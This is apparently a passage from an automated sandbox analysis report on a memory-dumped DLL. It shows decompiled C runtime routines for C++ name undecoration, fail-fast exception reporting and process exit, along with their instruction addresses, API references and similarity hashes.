										L146:
										_t875 = _t696 & 0x00001800;
										__eflags = _t875 - 0x800;
										_t430 = 0 | _t875 == 0x00000800;
										_t706 = _t696 & 0x00006000;
										L148:
										_v24 = _t706;
										__eflags = _t430;
										if(_t430 == 0) {
											L212:
											__eflags = _t868;
											if(_t868 == 0) {
												__eflags = _v24;
											} else {
												__eflags = _t875 - 0x800;
											}
											__eflags = 0 | __eflags == 0x00000000;
											_t433 = _t696;
											if(__eflags == 0) {
												_t434 = _t433 & 0x00001000;
												__eflags = _t434;
											} else {
												_t434 = _t433 & 0x00000400;
											}
											__eflags = _t434;
											if(_t434 != 0) {
												__eflags =  *0x6e213054 & 0x00001000;
												if(( *0x6e213054 & 0x00001000) == 0) {
													_v12 = "[thunk]:";
													_v8 = 8;
													E6E19D8A2(E6E19D46F( &_v48,  &_v12),  &_v12,  &_v20);
													_v20 = _v12;
													_v16 = _v8;
												}
											}
											__eflags = _t696 & 0x00010000;
											if((_t696 & 0x00010000) != 0) {
												_v12 = "extern \"C\" ";
												_v8 = 0xb;
												E6E19D8A2(E6E19D46F( &_v48,  &_v12),  &_v12,  &_v20);
												_v20 = _v12;
												_v16 = _v8;
											}
											L223:
											_t435 = _a4;
											 *_t435 = _v20;
											_t435[1] = _v16;
											L224:
											return _t435;
										}
										_t446 =  *0x6e213054; // 0x0
										_t448 =  !(_t446 >> 9);
										__eflags = _t448 & 0x00000001;
										if((_t448 & 0x00000001) == 0) {
											L183:
											_t449 =  *0x6e213054; // 0x0
											_t451 =  !(_t449 >> 7);
											__eflags = _t451 & 0x00000001;
											if((_t451 & 0x00000001) == 0) {
												goto L212;
											}
											_t717 = _v24;
											__eflags = _t868;
											if(_t868 == 0) {
												__eflags = _t717;
											} else {
												__eflags = _t875 - 0x800;
											}
											if(__eflags == 0) {
												L193:
												__eflags = _t868;
												if(_t868 == 0) {
													__eflags = _t717;
												} else {
													__eflags = _t875 - 0x800;
												}
												if(__eflags == 0) {
													L202:
													__eflags = _t868;
													if(_t868 == 0) {
														__eflags = _t717;
														_t457 = 0 | _t717 == 0x00000000;
														_t719 = _t696 & 0x00001800;
														__eflags = _t719;
													} else {
														__eflags = _t875 - 0x800;
														_t719 = _t875;
														_t457 = 0 | _t875 == 0x00000800;
													}
													__eflags = _t457;
													if(_t457 == 0) {
														goto L212;
													} else {
														__eflags = _t868;
														if(_t868 == 0) {
															__eflags = _t719;
														} else {
															_push(0);
															__eflags = _t696 & 0x000000c0;
															_pop(0);
														}
														if(__eflags == 0) {
															goto L212;
														} else {
															_v12 = "public: ";
															_v8 = 8;
															goto L211;
														}
													}
												} else {
													__eflags = _t868;
													if(_t868 == 0) {
														__eflags = _t875 - 0x1000;
													} else {
														__eflags = (_t696 & 0x000000c0) - 0x80;
													}
													if(__eflags == 0) {
														goto L202;
													} else {
														_v12 = "protected: ";
														_v8 = 0xb;
														goto L211;
													}
												}
											} else {
												__eflags = _t868;
												if(_t868 == 0) {
													__eflags = _t875 - 0x800;
												} else {
													__eflags = (_t696 & 0x000000c0) - 0x40;
												}
												if(__eflags == 0) {
													goto L193;
												} else {
													_v12 = "private: ";
													_v8 = 9;
													L211:
													E6E19D8A2(E6E19D46F( &_v48,  &_v12),  &_v12,  &_v20);
													_v20 = _v12;
													_v16 = _v8;
													goto L212;
												}
											}
										}
										__eflags = _t868;
										if(_t868 == 0) {
											__eflags = _t706;
										} else {
											__eflags = _t875 - 0x800;
										}
										if(__eflags == 0) {
											L157:
											__eflags = _t868;
											if(_t868 == 0) {
												_t471 = _v24;
												_t724 = 0;
												__eflags = _t471;
												goto L161;
											}
											goto L158;
										} else {
											__eflags = _t868;
											if(_t868 == 0) {
												L156:
												_v12 = "static ";
												_v8 = 7;
												E6E19D8A2(E6E19D46F( &_v48,  &_v12),  &_v12,  &_v20);
												_v20 = _v12;
												_v16 = _v8;
												goto L157;
											}
											__eflags = (_t696 & 0x00000700) - 0x200;
											if((_t696 & 0x00000700) != 0x200) {
												L158:
												__eflags = (_t696 & 0x00000700) - 0x100;
												if((_t696 & 0x00000700) == 0x100) {
													L182:
													_v12 = "virtual ";
													_v8 = 8;
													E6E19D8A2(E6E19D46F( &_v48,  &_v12),  &_v12,  &_v20);
													_v20 = _v12;
													_v16 = _v8;
													goto L183;
												}
												_t471 = _v24;
												_t724 = 0;
												__eflags = _t875 - 0x800;
												L161:
												__eflags = _t724 & 0xffffff00 | __eflags == 0x00000000;
												_t726 = _t696;
												if(__eflags == 0) {
													_t727 = _t726 & 0x00001000;
													__eflags = _t727;
												} else {
													_t727 = _t726 & 0x00000400;
												}
												__eflags = _t727;
												if(_t727 == 0) {
													goto L183;
												} else {
													__eflags = _t868;
													if(_t868 == 0) {
														__eflags = _t471;
														_t729 = 0 | _t471 == 0x00000000;
														_t861 = _t696 & 0x00001800;
														__eflags = _t861;
													} else {
														__eflags = _t875 - 0x800;
														_t861 = _t875;
														_t729 = 0 | _t875 == 0x00000800;
														_t471 = _t696 & 0x00006000;
													}
													__eflags = _t729;
													_v28 = _t471;
													_t730 = _t696;
													if(_t729 == 0) {
														_t731 = _t730 & 0x00000700;
														__eflags = _t731;
														goto L172;
													} else {
														_t731 = _t730 & 0x00000700;
														__eflags = _t731 - 0x500;
														if(_t731 == 0x500) {
															goto L182;
														}
														L172:
														_t472 = _t696;
														__eflags = _t868;
														if(_t868 == 0) {
															_t473 = _t472 & 0x00006000;
															__eflags = _t473;
														} else {
															_t473 = (_t472 & 0x00001800) - 0x800;
														}
														asm("sbb eax, eax");
														__eflags =  ~_t473 + 1;
														if( ~_t473 + 1 == 0) {
															L177:
															__eflags = _t868;
															if(_t868 == 0) {
																__eflags = _v28;
															} else {
																__eflags = _t861 - 0x800;
															}
															if(__eflags == 0) {
																goto L183;
															} else {
																__eflags = _t731 - 0x400;
																if(_t731 != 0x400) {
																	goto L183;
																}
																goto L182;
															}
														} else {
															__eflags = _t731 - 0x600;
															if(_t731 == 0x600) {
																goto L182;
															}
															goto L177;
														}
													}
												}
											}
											goto L156;
										}
									} else {
										_t673 =  !(_t833 >> 4);
										__eflags = _t673 & 0x00000001;
										if((_t673 & 0x00000001) == 0) {
											goto L97;
										}
										__eflags = 0x00001000 & _t833;
										if((0x00001000 & _t833) != 0) {
											goto L97;
										}
										_t678 = E6E19D8A2(E6E19D8C4(E6E19D833(_t833,  &_v56, 0x20,  &_v12),  &_v80, 0x20),  &_v88,  &_v20);
										_t583 = _t678[1];
										_v20 =  *_t678;
										L96:
										_v16 = _t583;
										goto L97;
									}
								}
							} else {
								__eflags = _t539 - 0x1100;
								if(_t539 == 0x1100) {
									goto L98;
								}
								__eflags = _t539 - 0x1200;
								if(_t539 == 0x1200) {
									goto L98;
								}
								goto L22;
							}
						} else {
							__eflags = (_t538 & 0x00001b00) - 0x1000;
							if((_t538 & 0x00001b00) == 0x1000) {
								goto L98;
							}
							_t538 = _t696;
							goto L16;
						}
					}
				}
				_v92 = 1;
				if(( *(_t853 + 4) & 0x00000200) != 0) {
					goto L3;
				}
				goto L2;
			}

0x6e19dbe5
0x6e19dbf2
0x6e19dbf4
0x6e19dbf7
0x6e19dbfa
0x6e19dbfd
0x6e19dc02
0x6e19dc05
0x6e19dc0a
0x6e19dc0e
0x6e19dc1c
0x6e19dc1c
0x6e19dc1f
0x6e19dc25
0x6e19dc27
0x6e19dc2a
0x6e19dc2d
0x6e19dc31
0x00000000
0x6e19dc31
0x6e19dc38
0x6e19dc3e
0x6e19dc45
0x00000000
0x6e19dc4d
0x6e19dc55
0x6e19dc5b
0x6e19dc5d
0x6e19dc60
0x6e19dc62
0x6e19dc65
0x00000000
0x6e19dc65
0x6e19dc70
0x6e19dc70
0x6e19dc76
0x6e19dc79
0x6e19e309
0x6e19e30d
0x6e19e317
0x6e19e319
0x6e19e392
0x6e19e399
0x6e19e39b
0x6e19e3b3
0x6e19e3b6
0x6e19e3b8
0x6e19e3ba
0x6e19e3bc
0x6e19e3d7
0x6e19e3df
0x6e19e3e0
0x6e19e3e3
0x6e19e3e3
0x6e19e3be
0x6e19e3be
0x6e19e3c6
0x6e19e3cc
0x6e19e3cf
0x6e19e3cf
0x6e19e3e9
0x6e19e3eb
0x6e19e3ee
0x6e19e3f0
0x6e19e3f2
0x6e19e407
0x6e19e40c
0x6e19e40c
0x6e19e412
0x6e19e415
0x6e19e3f4
0x6e19e3f4
0x6e19e3ff
0x6e19e402
0x6e19e402
0x6e19e418
0x6e19e41a
0x6e19e44a
0x6e19e44c
0x6e19e44e
0x6e19e458
0x6e19e450
0x6e19e450
0x6e19e450
0x6e19e45d
0x6e19e45f
0x6e19e462
0x6e19e464
0x6e19e464
0x6e19e467
0x6e19e469
0x6e19e496
0x6e19e498
0x6e19e49a
0x6e19e4a4
0x6e19e49c
0x6e19e49c
0x6e19e49c
0x6e19e4a9
0x6e19e4ab
0x6e19e4ae
0x6e19e4b0
0x6e19e4b0
0x6e19e4b3
0x6e19e4b5
0x6e19e553
0x6e19e553
0x6e19e555
0x00000000
0x00000000
0x6e19e55e
0x6e19e563
0x00000000
0x00000000
0x00000000
0x6e19e4bb
0x6e19e4cb
0x6e19e4cd
0x6e19e4ce
0x6e19e4d0
0x6e19e4d2
0x6e19e4d4
0x00000000
0x00000000
0x6e19e4d6
0x6e19e4dd
0x00000000
0x6e19e4dd
0x6e19e46b
0x6e19e47b
0x6e19e47d
0x6e19e47e
0x6e19e480
0x6e19e482
0x6e19e484
0x00000000
0x00000000
0x6e19e486
0x6e19e48d
0x00000000
0x6e19e48d
0x6e19e41c
0x6e19e42c
0x6e19e42e
0x6e19e42f
0x6e19e431
0x6e19e433
0x6e19e435
0x00000000
0x00000000
0x6e19e437
0x6e19e43e
0x6e19e4e4
0x6e19e4eb
0x6e19e4f0
0x6e19e4f2
0x6e19e569
0x6e19e569
0x6e19e56b
0x6e19e4fc
0x6e19e4ff
0x6e19e501
0x6e19e504
0x6e19e506
0x6e19e506
0x6e19e509
0x6e19e50b
0x6e19e570
0x6e19e578
0x00000000
0x6e19e50d
0x6e19e511
0x6e19e519
0x6e19e51f
0x6e19e522
0x6e19e524
0x6e19e526
0x6e19e528
0x6e19e53f
0x6e19e549
0x6e19e57f
0x6e19e584
0x6e19e587
0x6e19e58a
0x6e19e58c
0x6e19e5af
0x6e19e5b7
0x6e19e5b8
0x6e19e5bb
0x6e19e5bb
0x00000000
0x6e19e5bb
0x00000000
0x6e19e58c
0x6e19e52e
0x6e19e534
0x6e19e537
0x6e19e539
0x6e19e53b
0x6e19e53d
0x00000000
0x00000000
0x00000000
0x6e19e53d
0x6e19e50b
0x6e19e4f4
0x6e19e4f4
0x6e19e4f6
0x00000000
0x6e19e4f6
0x6e19e41a
0x6e19e3a4
0x6e19e3a9
0x6e19e3ab
0x6e19e3ab
0x00000000
0x6e19e3ab
0x6e19e31d
0x6e19e31f
0x6e19e324
0x6e19e384
0x6e19e38b
0x00000000
0x6e19e38b
0x6e19e326
0x6e19e32b
0x00000000
0x00000000
0x6e19e32d
0x6e19e332
0x00000000
0x00000000
0x6e19e33a
0x6e19e342
0x6e19e349
0x6e19e350
0x6e19e353
0x6e19e35d
0x6e19e37d
0x00000000
0x6e19dc7f
0x6e19dc81
0x6e19dc83
0x6e19dc89
0x6e19dc8c
0x6e19dc92
0x6e19dca8
0x6e19dcad
0x6e19dcb0
0x6e19dcb0
0x6e19dcb0
0x6e19dcb7
0x6e19dc94
0x6e19dc94
0x6e19dc99
0x6e19dc9c
0x6e19dca3
0x6e19dca3
0x6e19dcba
0x6e19dcbc
0x6e19dcbe
0x6e19dcd2
0x6e19dcd2
0x6e19dcd7
0x6e19dcdd
0x6e19dced
0x6e19dcf0
0x6e19dcdf
0x6e19dce2
0x6e19dce5
0x6e19dce5
0x6e19dcf3
0x6e19dcf6
0x6e19dd0e
0x6e19dd0e
0x6e19dd14
0x6e19dd16
0x6e19dd2a
0x6e19dd2c
0x6e19dd2d
0x6e19dd30
0x6e19dd5d
0x6e19dd32
0x6e19dd3e
0x6e19dd43
0x6e19dd4b
0x6e19dd4e
0x6e19dd4e
0x6e19dd62
0x6e19dd65
0x6e19dd65
0x6e19dd68
0x6e19dd6b
0x6e19dd6e
0x6e19dd71
0x6e19dd77
0x6e19dd79
0x6e19dd79
0x6e19dd7c
0x6e19dd7f
0x6e19de9d
0x6e19de9d
0x6e19dea2
0x6e19dea5
0x6e19dea8
0x6e19deab
0x6e19deae
0x6e19deb1
0x6e19deb4
0x6e19deb7
0x6e19deba
0x6e19debd
0x6e19dec0
0x6e19dec2
0x6e19dec4
0x6e19dec4
0x6e19dec8
0x6e19dece
0x6e19ded0
0x6e19df70
0x6e19df70
0x6e19df72
0x6e19df74
0x6e19df7a
0x6e19df7c
0x6e19df84
0x6e19df89
0x6e19df8a
0x6e19dfa9
0x6e19df8c
0x6e19df8c
0x6e19df97
0x6e19df9a
0x6e19df9a
0x6e19df8a
0x6e19df7a
0x6e19dfae
0x6e19dfb8
0x6e19dfba
0x6e19dfbf
0x6e19dfc0
0x6e19dfee
0x6e19dff8
0x6e19dffd
0x6e19dffd
0x6e19e000
0x6e19e002
0x6e19e004
0x6e19e03a
0x6e19e03a
0x6e19e03d
0x6e19e040
0x6e19e043
0x6e19e07f
0x6e19e084
0x6e19e086
0x6e19e088
0x6e19e08a
0x6e19e08d
0x6e19e08d
0x6e19e094
0x6e19e0a0
0x6e19e0a3
0x6e19e0a6
0x6e19e0a6
0x6e19e0ae
0x6e19e0b0
0x6e19e0b2
0x6e19e0bc
0x6e19e0bc
0x6e19e0b4
0x6e19e0b4
0x6e19e0b4
0x6e19e0c2
0x6e19e0c4
0x6e19e1e3
0x6e19e1e3
0x6e19e1ea
0x6e19e1ec
0x6e19e1f3
0x6e19e1f8
0x6e19e1f8
0x6e19e1f3
0x6e19e226
0x6e19e22b
0x6e19e232
0x6e19e23b
0x6e19e240
0x6e19e249
0x6e19e249
0x6e19e240
0x6e19e24e
0x6e19e256
0x6e19e258
0x6e19e25d
0x6e19e25e
0x6e19e271
0x6e19e278
0x6e19e27b
0x6e19e260
0x6e19e260
0x6e19e267
0x6e19e26a
0x6e19e26a
0x6e19e28e
0x6e19e293
0x6e19e29b
0x6e19e29d
0x6e19e2a2
0x6e19e2a3
0x6e19e2c0
0x6e19e2a5
0x6e19e2af
0x6e19e2af
0x6e19e2d3
0x6e19e2d8
0x6e19e2e0
0x6e19e2e2
0x6e19e2e4
0x00000000
0x6e19e2e6
0x6e19e2e6
0x6e19e2e8
0x00000000
0x00000000
0x6e19e2ed
0x6e19e2f2
0x6e19e2f8
0x6e19e2fb
0x00000000
0x6e19e2fb
0x6e19e0ca
0x6e19e0ca
0x6e19e0cc
0x6e19e197
0x6e19e19a
0x6e19e1a5
0x6e19e1ac
0x6e19e1b1
0x6e19e1b4
0x6e19e1b7
0x6e19e1bd
0x6e19e1c4
0x6e19e1cb
0x6e19e1d2
0x6e19e1d7
0x6e19e1db
0x6e19e1de
0x00000000
0x6e19e1de
0x6e19e0d2
0x6e19e0d8
0x6e19e149
0x6e19e14b
0x00000000
0x00000000
0x6e19e14d
0x6e19e153
0x00000000
0x00000000
0x6e19e158
0x6e19e163
0x6e19e16a
0x6e19e173
0x6e19e179
0x6e19e17e
0x6e19e183
0x6e19e184
0x6e19e184
0x6e19e187
0x6e19e190
0x00000000
0x6e19e190
0x6e19e0dd
0x6e19e0e8
0x6e19e0fe
0x6e19e13a
0x6e19e142
0x6e19e144
0x6e19e145
0x00000000
0x6e19e145
0x6e19e0c4
0x6e19e056
0x6e19e05b
0x6e19e062
0x6e19e067
0x6e19e071
0x00000000
0x00000000
0x00000000
0x6e19e073
0x6e19e006
0x6e19e009
0x6e19e031
0x6e19e031
0x6e19e034
0x6e19e037
0x00000000
0x6e19e037
0x6e19e00b
0x6e19e015
0x00000000
0x00000000
0x6e19e01e
0x6e19e023
0x6e19e026
0x6e19e02a
0x00000000
0x6e19e02a
0x6e19dfc5
0x6e19dfc7
0x6e19dfca
0x00000000
0x00000000
0x6e19dfdc
0x6e19dfe6
0x6e19dfe9
0x00000000
0x6e19ded6
0x6e19ded6
0x6e19ded8
0x6e19df4f
0x6e19df55
0x6e19df5d
0x6e19df64
0x6e19df67
0x6e19df6d
0x00000000
0x6e19df6d
0x6e19deda
0x6e19dee0
0x6e19df29
0x6e19df2b
0x6e19df2d
0x00000000
0x00000000
0x6e19df2f
0x6e19df34
0x00000000
0x00000000
0x6e19df3c
0x6e19df45
0x6e19df48
0x6e19df4c
0x6e19df4c
0x00000000
0x6e19df4c
0x6e19dee8
0x6e19def0
0x6e19def6
0x6e19deff
0x6e19df07
0x6e19df0d
0x6e19df16
0x6e19df1e
0x6e19df21
0x6e19df24
0x00000000
0x6e19df24
0x6e19dd85
0x6e19dd85
0x6e19dd8b
0x00000000
0x00000000
0x6e19dd99
0x6e19dda5
0x6e19ddbf
0x6e19ddc8
0x6e19ddd2
0x6e19ddd3
0x6e19ddd9
0x6e19ddde
0x6e19dde9
0x6e19ddf3
0x6e19ddf8
0x6e19de0e
0x6e19de0e
0x6e19de16
0x6e19de21
0x6e19de28
0x6e19de31
0x6e19de37
0x6e19de41
0x6e19de43
0x6e19de45
0x6e19e301
0x6e19e301
0x6e19e58e
0x6e19e592
0x6e19e59a
0x6e19e5a0
0x6e19e5a3
0x6e19e5c1
0x6e19e5c1
0x6e19e5c4
0x6e19e5c6
0x6e19e854
0x6e19e856
0x6e19e858
0x6e19e862
0x6e19e85a
0x6e19e85a
0x6e19e85a
0x6e19e868
0x6e19e86a
0x6e19e86c
0x6e19e875
0x6e19e875
0x6e19e86e
0x6e19e86e
0x6e19e86e
0x6e19e87a
0x6e19e87c
0x6e19e87e
0x6e19e888
0x6e19e88d
0x6e19e898
0x6e19e8ae
0x6e19e8b6
0x6e19e8bc
0x6e19e8bc
0x6e19e888
0x6e19e8bf
0x6e19e8c5
0x6e19e8ca
0x6e19e8d5
0x6e19e8eb
0x6e19e8f3
0x6e19e8f9
0x6e19e8f9
0x6e19e8fc
0x6e19e8fc
0x6e19e902
0x6e19e907
0x6e19e90a
0x00000000
0x6e19e90a
0x6e19e5cc
0x6e19e5d4
0x6e19e5d6
0x6e19e5d8
0x6e19e748
0x6e19e748
0x6e19e750
0x6e19e752
0x6e19e754
0x00000000
0x00000000
0x6e19e75a
0x6e19e75f
0x6e19e761
0x6e19e76b
0x6e19e763
0x6e19e763
0x6e19e763
0x6e19e772
0x6e19e7a2
0x6e19e7a4
0x6e19e7a6
0x6e19e7b0
0x6e19e7a8
0x6e19e7a8
0x6e19e7a8
0x6e19e7b7
0x6e19e7e4
0x6e19e7e6
0x6e19e7e8
0x6e19e7f7
0x6e19e7fb
0x6e19e7fe
0x6e19e7fe
0x6e19e7ea
0x6e19e7ea
0x6e19e7f0
0x6e19e7f2
0x6e19e7f2
0x6e19e804
0x6e19e806
0x00000000
0x6e19e808
0x6e19e808
0x6e19e80a
0x6e19e816
0x6e19e80c
0x6e19e80c
0x6e19e80e
0x6e19e811
0x6e19e811
0x6e19e81d
0x00000000
0x6e19e81f
0x6e19e81f
0x6e19e826
0x00000000
0x6e19e826
0x6e19e81d
0x6e19e7b9
0x6e19e7bb
0x6e19e7bd
0x6e19e7c7
0x6e19e7bf
0x6e19e7c3
0x6e19e7c3
0x6e19e7d2
0x00000000
0x6e19e7d4
0x6e19e7d4
0x6e19e7db
0x00000000
0x6e19e7db
0x6e19e7d2
0x6e19e774
0x6e19e776
0x6e19e778
0x6e19e782
0x6e19e77a
0x6e19e77e
0x6e19e77e
0x6e19e78d
0x00000000
0x6e19e78f
0x6e19e78f
0x6e19e796
0x6e19e82d
0x6e19e843
0x6e19e84b
0x6e19e851
0x00000000
0x6e19e851
0x6e19e78d
0x6e19e772
0x6e19e5e0
0x6e19e5e2
0x6e19e5ec
0x6e19e5e4
0x6e19e5e4
0x6e19e5e4
0x6e19e5f3
0x6e19e63c
0x6e19e63c
0x6e19e63e
0x6e19e65f
0x6e19e662
0x6e19e664
0x00000000
0x6e19e664
0x00000000
0x6e19e5f5
0x6e19e5f5
0x6e19e5f7
0x6e19e607
0x6e19e60a
0x6e19e615
0x6e19e62b
0x6e19e633
0x6e19e639
0x00000000
0x6e19e639
0x6e19e600
0x6e19e605
0x6e19e640
0x6e19e647
0x6e19e64c
0x6e19e713
0x6e19e716
0x6e19e721
0x6e19e737
0x6e19e73f
0x6e19e745
0x00000000
0x6e19e745
0x6e19e652
0x6e19e655
0x6e19e657
0x6e19e666
0x6e19e669
0x6e19e66b
0x6e19e66d
0x6e19e677
0x6e19e677
0x6e19e66f
0x6e19e66f
0x6e19e66f
0x6e19e67d
0x6e19e67f
0x00000000
0x6e19e685
0x6e19e687
0x6e19e689
0x6e19e69f
0x6e19e6a3
0x6e19e6a6
0x6e19e6a6
0x6e19e68b
0x6e19e68b
0x6e19e693
0x6e19e695
0x6e19e698
0x6e19e698
0x6e19e6ac
0x6e19e6ae
0x6e19e6b1
0x6e19e6b3
0x6e19e6c5
0x6e19e6c5
0x00000000
0x6e19e6b5
0x6e19e6b5
0x6e19e6bb
0x6e19e6c1
0x00000000
0x00000000
0x6e19e6cb
0x6e19e6cb
0x6e19e6cd
0x6e19e6cf
0x6e19e6dd
0x6e19e6dd
0x6e19e6d1
0x6e19e6d6
0x6e19e6d6
0x6e19e6e4
0x6e19e6e7
0x6e19e6e9
0x6e19e6f3
0x6e19e6f5
0x6e19e6f7
0x6e19e701
0x6e19e6f9
0x6e19e6f9
0x6e19e6f9
0x6e19e709
0x00000000
0x6e19e70b
0x6e19e70b
0x6e19e711
0x00000000
0x00000000
0x00000000
0x6e19e711
0x6e19e6eb
0x6e19e6eb
0x6e19e6f1
0x00000000
0x00000000
0x00000000
0x6e19e6f1
0x6e19e6e9
0x6e19e6b3
0x6e19e67f
0x00000000
0x6e19e605
0x6e19de4b
0x6e19de50
0x6e19de52
0x6e19de54
0x00000000
0x00000000
0x6e19de5a
0x6e19de5c
0x00000000
0x00000000
0x6e19de8b
0x6e19de92
0x6e19de95
0x6e19e2fe
0x6e19e2fe
0x00000000
0x6e19e2fe
0x6e19de45
0x6e19dcf8
0x6e19dcf8
0x6e19dcfd
0x00000000
0x00000000
0x6e19dd03
0x6e19dd08
0x00000000
0x00000000
0x00000000
0x6e19dd08
0x6e19dcc0
0x6e19dcc5
0x6e19dcca
0x00000000
0x00000000
0x6e19dcd0
0x00000000
0x6e19dcd0
0x6e19dcbe
0x6e19dc79
0x6e19dc17
0x6e19dc1a
0x00000000
0x00000000
0x00000000

APIs

operator+.LIBVCRUNTIME ref: 6E19DC45
DName::operator+.LIBCMT ref: 6E19DD99
DName::operator+.LIBCMT ref: 6E19DDB6

Strings

8S n, xrefs: 6E19E0DD
4S n, xrefs: 6E19E342
h0!n, xrefs: 6E19E07A
HS n, xrefs: 6E19E173, 6E19E176

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$operator+
String ID: 4S n$8S n$HS n$h0!n
API String ID: 1595903985-2070992878
Opcode ID: c7bc7781b12ec2b4d10b42508c12c3d10f6963b8436682966316da9a459f1b7d
Instruction ID: 182b6fee680494601a4219c3db577961a9dcbcd4619ed4a8e7df9804a4fd3b50
Opcode Fuzzy Hash: c7bc7781b12ec2b4d10b42508c12c3d10f6963b8436682966316da9a459f1b7d
Instruction Fuzzy Hash: 21826376D1020A9BDF45CFE8C894BEEB7F9BF54304F104529E516E7280EB389A84EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AD780, Relevance: 4.6, APIs: 3, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E1AD780(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4, char _a8, char _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t70;
				signed int _t72;
				signed int _t74;

				_t70 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t72 = _t74;
				_t40 =  *0x6e212008; // 0xa172442e
				_t41 = _t40 ^ _t72;
				_v8 = _t40 ^ _t72;
				_push(__edi);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E6E19B07E(_t41);
					_pop(_t62);
				}
				E6E19BBC0(_t67,  &_v804, 0, 0x50);
				E6E19BBC0(_t67,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t70;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_t23 =  &_v0; // 0xf4458d6e
				_v540 =  *_t23;
				_t25 =  &_v0; // 0x6e199e56
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_t28 = _t49 - 4; // 0x20fff068
				_v544 =  *_t28;
				_t30 =  &_a8; // 0x55cc0000
				_v804 =  *_t30;
				_t32 =  &_a12; // 0xec83ec8b
				_v800 =  *_t32;
				_t34 =  &_v0; // 0xf4458d6e
				_v792 =  *_t34;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // 0x6e199b2a
				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_t38 =  &_a4; // 0x1aede850
					_push( *_t38);
					E6E19B07E(_t57);
				}
				_t39 =  &_v8; // 0xfffffd5c
				return E6E199EE7( *_t39 ^ _t72);
			}

0x6e1ad780
0x6e1ad780
0x6e1ad780
0x6e1ad780
0x6e1ad783
0x6e1ad78b
0x6e1ad790
0x6e1ad792
0x6e1ad799
0x6e1ad79a
0x6e1ad79c
0x6e1ad79f
0x6e1ad7a4
0x6e1ad7a4
0x6e1ad7b0
0x6e1ad7c3
0x6e1ad7d1
0x6e1ad7d7
0x6e1ad7dd
0x6e1ad7e3
0x6e1ad7e9
0x6e1ad7ef
0x6e1ad7f5
0x6e1ad7fb
0x6e1ad801
0x6e1ad807
0x6e1ad80e
0x6e1ad815
0x6e1ad81c
0x6e1ad823
0x6e1ad82a
0x6e1ad831
0x6e1ad832
0x6e1ad838
0x6e1ad83b
0x6e1ad841
0x6e1ad841
0x6e1ad844
0x6e1ad84a
0x6e1ad854
0x6e1ad857
0x6e1ad85d
0x6e1ad860
0x6e1ad866
0x6e1ad869
0x6e1ad86f
0x6e1ad872
0x6e1ad880
0x6e1ad882
0x6e1ad888
0x6e1ad897
0x6e1ad8a3
0x6e1ad8a3
0x6e1ad8a6
0x6e1ad8ab
0x6e1ad8ac
0x6e1ad8b8

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 6E1AD878
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 6E1AD882
UnhandledExceptionFilter.KERNEL32(6E199B2A,?,?,?,?,?,00000001), ref: 6E1AD88F

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: c020b03623d6faae2842aade8470c943108e1ae14b353288bac3819977c74062
Instruction ID: ff732053bc844b037e927718fe4106c484f8a46704c2fc9b1b0f4d35d344cc3d
Opcode Fuzzy Hash: c020b03623d6faae2842aade8470c943108e1ae14b353288bac3819977c74062
Instruction Fuzzy Hash: A531E57490121C9BCB61DF68D888BDDBBB8BF18314F5041EAE81CA7290E7709BC19F45

Uniqueness

Uniqueness Score: -1.00%

Function 6E1ADFA0, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1ADFA0(int _a4) {
				void* _t14;

				if(E6E1B726E(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E6E1AE004(_t14, _a4);
				ExitProcess(_a4);
			}

0x6e1adfad
0x6e1adfc9
0x6e1adfc9
0x6e1adfd2
0x6e1adfdb

APIs

GetCurrentProcess.KERNEL32(?,?,6E1ADF9F,?,00000001,?,?), ref: 6E1ADFC2
